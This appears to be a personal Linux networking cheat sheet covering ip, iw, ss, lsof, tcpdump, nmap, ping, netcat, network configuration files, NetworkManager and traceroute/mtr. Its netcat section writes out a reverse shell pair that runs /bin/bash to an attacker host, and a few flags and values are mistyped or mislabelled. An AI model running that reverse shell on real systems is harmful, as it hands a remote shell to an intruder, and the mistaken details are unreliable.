Linux Networking
Network interface Management
1. Wired Interfaces
There are two main commands addr (Layer 3) and link (Layer 2). They have a CRUD interface, can check the help using ip <command> help. ip commands replaced ifconfig commands
ip lCRUD:
ip link show
ip link show dev <interface-name>
ip link add [link <dev-name>] name <interface-name> type <link-type> # Add a virtual link
ip link del dev <interface-name>
ip aCRUD:
ip addr show
ip addr show dev <interface-name>
ip addr add dev <interface-name> <ip-address>/<mask>
ip addr del dev <interface-name> <ip-address>/<mask>
2. Wireless Interfaces
iw replaced iwconfig and iwlist. iw dev is used to manage the wireless interfaces, scan for available networks, link to a Network (using SSID) etc ... iw phy manages the hardware device.
iw dev wlan0 link # information about the link
iw dev wlan0 info # information about the interface
iw dev wlan0 scan
iw dev wlan0 connect <SSID>
3. ARP protocol
ip [-s] neigh is used to display the neighbors list aka arp cache/table (-s to have verbose statistics). ip n offers a CRuS interface to manage the ARP cache
ip n add <ip-addr> lladr <mac-addr> dev <interface-name>
ip n del <ip-addr> dev <interface-name>
ip n show dev <interface-name>
ip n replace <ip-addr> lladr <mac-addr> dev <interface-name> # Replace or ADD a MAC for the IP address
Notes
- Difference between link, device and interface Source: In Linux context they all refer to Kernel's
netdevbut in networking they can mean different things:- Link: the actual circuit, path, and/or cable between ports.
- Device: either the entire system, or the blob within it that creates the electrical (optical) signal.
- Interface: the logical middleground between the two, often in the context of the OS (eth0, f0/0, etc.)
TCP/IP
1. Routing
Iproute handles routing the ip route command.
ip route add <network-ip-address>/mask via <router-ip-address> dev <interface-name>
ip route del <network-ip-address>/mask via <router-ip-address> dev <interface-name>
ip route default via <default-gateway-ip>
ip route add prohibit <network-ip-address>/mask # blocks route and sends back an ICMP message
ip route add blackhole <network-ip-address>/mask # blocks route silently
2. TCP ports
Iproute replaces netstat with ss
ss -lntp
# -l: listening sockets, -n: numerical port numbers, and hostnames -t: tcp, p: show processes using the socket
lsof is very useful too! it shows the open files per user, per process.
lsof -i4 # list all IPv4 network
lsof -p <pid> # list by pid
lsof -u <username> # list by user ^ for negation
lsof -i <protocol>:<port> # list by port
lsof <file-path> # process opening a file
3. TCPDump
TCP dump performs packet monitoring and capture on any Network interface (even Bleutooth, loopback ....)
tcpdump -D # list interfaces available for capture
tcpdump -i <interface-name> -c <count> -w <file-path> # capture packets on an interface and save the results to a file
TCPDump Cheatsheet
| Option | Description |
|---|---|
| -D | List interfaces available for capture |
| -i eth0 | Capture packets on an interface or all interfaces (any) |
| -c | Capture a specified count of packets |
| -n | Disable hostname resolution |
| -nn | Disable protocol, port, and hostname resolution |
| -i any protocol | Capture packets by protocol on all interfaces |
| -i any host 10.0.2.18 | Capture packets by a host on all interfaces |
| -i any src/dst 10.0.2.10 | Capture packets by source or destination address on all interfaces |
| -A | View packet content in ASCII |
| -X | View packet content in hex and ASCII |
| -w file_name.pcap | Save the output of tcpdump to a file |
| -r file_name.pcap | Read packets from a file |
4. Port Scanning with Nmap
Nmap is a port scanner. It supports many scanning modes.
nmap -iL <host-file> # scan all hosts in a file
nmap -sn <hostname> # Ping scan, host discovery
nmap -Pn <hostname> # Skips host discovery, Only scan the ports.
nmap -r <hostname> # Scan consecutively, don't randomize
nmap -F <hostname> # Perform a fast scan, only common ports
nmap -p <port1,...,portn> <hostname> # select ports to scan
nmap -sU/-sP <hostname> # scan UDP or TCP (default) ports only
nmap -sS <hostname> # TCP Syn scan (stealthy), quick and un-intrusive. start TCP handshake and never end it.
nmap -sT <hostname> # TCP connect Scan.
5. Interacting with remote hosts
ping send an ICMP packet to a destination IP. Very useful for troubleshooting and discovery.
Ping Cheatsheet
| Option | Description |
|---|---|
| hostname | Send a stream of ICMP packets to a hostname |
| 10.0.2.10 | Send a stream of ICMP packets to an IP address |
| -c 5 10.0.2.10 | Send a specified amount of packets |
| -s 100 10.0.2.10 | Alter the size of the packets |
| -i 3 10.0.2.10 | Change the interval for sending packets |
| -q 10.0.2.10 | Only show the summary information |
| -w 5 10.0.2.10 | Set a timeout of when to stop sending packets |
| -f 10.0.2.10 | Flood ping. Send packets as soon as possible. |
| -p ff 10.0.2.10 | Fill a packet with data. ff fills the packet with ones |
| -b 10.0.2.10 | Send packets to a broadcast address |
| -t 10 10.0.2.10 | Limit the number of network hops |
| -v 10.0.2.10 | Increase verbosity |
6. Netcat
Netcat is also very useful in this regard, since it writes and reads data across networks.
nc -l <port> # Listen on specific port
nc -u -l <port> # listen on an UDP port
nc -v -z <ip-address> <port> # Report connection status
# Reverse Shell
nc -lvp 4444 # On Attacker machine open a connection
nc <attacker-hostname> 4444 -e /bin/bash # On the victim machine
# File Transfer
nc -lvp 4444 > text.txt
nc <hostname> 4444 < test.txt
# Send GET Request to a webserver
printf "GET / HTTP/1.0\r\n\r\n" | nc <hostname> <port>
Network Configurations
1. RHEL Based systems (Old)
The config files used to live in /etc/sysconfig/network-scripts
| Option | Description |
|---|---|
| TYPE=Ethernet | The type of network interface device (e.g., Ethernet, Wi-Fi) |
| BOOTPROTO=none | Specify boot protocol (none, dhcp, bootp) |
| DEFROUTE=yes | Specify default route for IPv4 traffic (yes, no) |
| IPV4_DEFROUTE=yes | Specify default route for IPv6 traffic (yes, no) |
| IPV4_FAILURE_FATAL=no | Disable the device if the configuration fails (yes, no) |
| IPV6_FAILURE_FATAL=no | Disable the device if the configuration fails (yes, no) |
| IPV6INIT=yes | Enable or disable IPv6 on the interface (yes, no) |
| IPV6_AUTOCONF=yes | Enable or disable autoconf configuration (yes, no) |
| NAME=eth0 | Specify a name for the connection |
| UUID=... | Specify the unique identifier for the device |
| ONBOOT=yes | Activate interface on boot (yes, no) |
| HWADDR=00:00:00:00:00:00 | Specify the MAC address for the interface |
| IPADDR=10.0.1.10 | Specify the IPv4 address. |
| PREFIX=24 | Specify the network prefix. |
| NETMASK=255.255.255 | Specify the netmask. |
| GATEWAY=10.0.1.1 | Specify the gateway. |
| DNS1=192.168.123.3 | Specify a DNS server. |
| DNS2=192.168.123.2 | Specify another DNS server. |
| PEERDNS=yes | Modify the /etc/resolv.conf file (yes/no). |
2. Debian Based Systems (Old)
All the network interfaces configurations go into /etc/network/interfaces, with an /etc/network/interfaces.d. Interfaces with lines beginning with auto are brought up on system startup.
3. Distro agnostic config files
In addition to the distro related network configuration files, here are the most common remaining ones:
/etc/hosts: Name to IP Address associations/etc/resolv.conf: DNS resolver configuration- `/etc/sysconfig/network: Global network settings
/etc/nsswitch.conf: The Name Service Switch config file, used to determine Sources from which to obtain name-service information, and their order./etc/hostname: holds the machine hostname (can be set/shown usinghostnameorhostnamectl)/etc/hosts.denyand/etc/hosts.allow: Allow or block access to certain services from remote clients (Can useALLto block or allow all). For example to only allow hosts from10.0.3.*network to connect to our host via SSH we can do the following
# /etc/hosts.deny
sshd : ALL
# /etc/hosts.allow
sshd : 10.0.3.*
4. Network Manager
- Network Manager vs ifcfg-* Options
| nmcli con mod | ifcfg-* file | Purpose |
|---|---|---|
| ipv4.method manual | BOOTPROTO=none | Set a static IPv4 address |
| ipv4.method auto | BOOTPROTO-dhcp | Automatically set IPv4 address using DHCP |
| ip4 | ipv4.address "192.168.0.10/24" | IPADDR=192.168.0.10 PREFIX=24 |
| gw4 | ipv4.gateway 192.168.0.1 | GATEWAY=192.168.0.1 |
| ipv4.dns 8.8.8.8 | DNS1-8.8.8.8 | Specify DNS server |
| autoconnect yes | ONBOOT=yes | Automatically activate this connection on boot |
| con-name eth0 | NAME=eth0 | Specify the name of the connection |
| ifname eth0 | DEVICE-eth0 | Specify the interface for the connection |
| 802-3-ethernet.mac-address ADDR | HWADDR=... | Specify the MAC address of the interface for the connection |
nmclicommands
| Purpose | Command |
|---|---|
| nmcli dev status | Show the status of all network interfaces |
| nmcli con show | List all connections |
| nmcli con show name | List the current settings for the connection name |
| nmcli con add con-name name ... | Add a new connection named name |
| nmcli con mod name ... | Modify a connection |
| nmcli con reload | Reload the network configuration files |
| nmcli con up name 1 nmcli con down name | Activate or deactivate a connection |
| nmcli dev dis dev | Deactivate and disconnect the current connection |
| nmcli con del name | Delete the connection and its configuration file |
Network Diagnostics and Troubleshooting
1. Traffic analysis with Traceroute and MTR
Traceroute tracks the route taken by packets from source to destination. The traceroutecommand uses UDP packet by default, but can use ICMP ECHO -I or TCP SYN -T for probing. Tracepath is modern alternative with less fancy options.
traceroute -n -q 2 -I www.google.com # Don't resolve hostname, use ICMP and send only 2 probes per host.
MTR on the other hand use ICMP ECHO by default, but this can be changed using -T (TCP) and -u (UDP). ALso MTR is a TUI and record more statistics.
mtr -r -c 3 -f 4 www.google.com # Generate a report instead of RT interface (3 runs, start as 6th hop).
mtr -run4 -c 3 www.google.com # Only non resolved IPv4 addresses, use UDP for probes.
mtr -w -c 3 www.google.com # Generate a wise report instead (non truncated IP addresses/hostnames)
2. Network logs
Debian Based systems use /var/log/syslog for logging system logs, while RHEL based use /var/log/messages.
Another source for logs is Systemd logs, which are stored in a binary format and can be consulted using the journalctl utility. In Addition to all of that we have dmesg which read messages from the Kernel ring buffer.
Notes
- Traceroute and MTR are very useful to troubleshoot and diagnose any network traffic problems.
- Changing between UDP, ICMP and TCP probes can be helpful to avoid routers filtering.
- The kernel ring buffer is a data structure in the Linux kernel that stores log messages generated by the kernel. It is a cyclic buffer that holds the most recent log messages and can be read through the /proc/kmsg file or by using the dmesg command. The kernel ring buffer provides a quick and efficient way for system administrators to diagnose and troubleshoot problems with the Linux system.